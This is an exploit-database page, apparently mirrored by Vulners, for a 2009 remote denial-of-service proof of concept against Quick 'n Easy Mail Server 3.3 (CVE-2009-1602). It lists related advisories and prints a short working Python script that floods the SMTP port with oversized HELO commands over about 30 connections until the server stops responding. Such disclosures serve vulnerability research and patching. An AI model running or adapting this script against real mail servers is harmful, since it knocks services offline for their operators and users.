Lucene search
+L

Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)

🗓️ 04 May 2009 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC) by shinna

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-1602
4 May 200900:00
circl
CVE
CVE-2009-1602
11 May 200915:19
cve
Cvelist
CVE-2009-1602
11 May 200915:19
cvelist
EUVD
EUVD-2009-1597
7 Oct 202500:30
euvd
NVD
CVE-2009-1602
11 May 200915:30
nvd
OpenVAS
Quick 'n Easy Mail Server SMTP Request Remote Denial Of Service Vulnerability
6 May 200900:00
openvas
OpenVAS
Quick 'n Easy Mail Server 3.3 SMTP Request Remote DoS Vulnerability
6 May 200900:00
openvas
Prion
Design/Logic Flaw
11 May 200915:30
prion
# ---------------------------------------------------------------
# Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service
# http://www.pablosoftwaresolutions.com/

# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net/

# When you pass a long string to the server, it checks for bof
# type attacks and answers with a:
# "<SMTP> Buffer overflow: DOS attack?"
# after 25 requests (more or less), server is unable to handle
# errors.
# An attacker can exploit this issue to trigger dos conditions.
# In case of succesful exploitation of this vulnerability,
# the server will answer to requests as below:
# "<SMTP> 421 Service not available"
#---------------------------------------------------------------"

import socket

try:
   for i in range(1,30):
      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      conn = s.connect(("127.0.0.1",25))
      s.send('HELO ' + "[email protected]" * 4000 + '\r\n')
      d = s.recv(1024)
      print d
      s.close
   raw_input("Done. If server is still available, try to increase the number of requests.\n\nPress enter to quit...")
except:
   raw_input("Unable to connect!\n\nPress enter to quit...")

# milw0rm.com [2009-05-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 May 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02759
31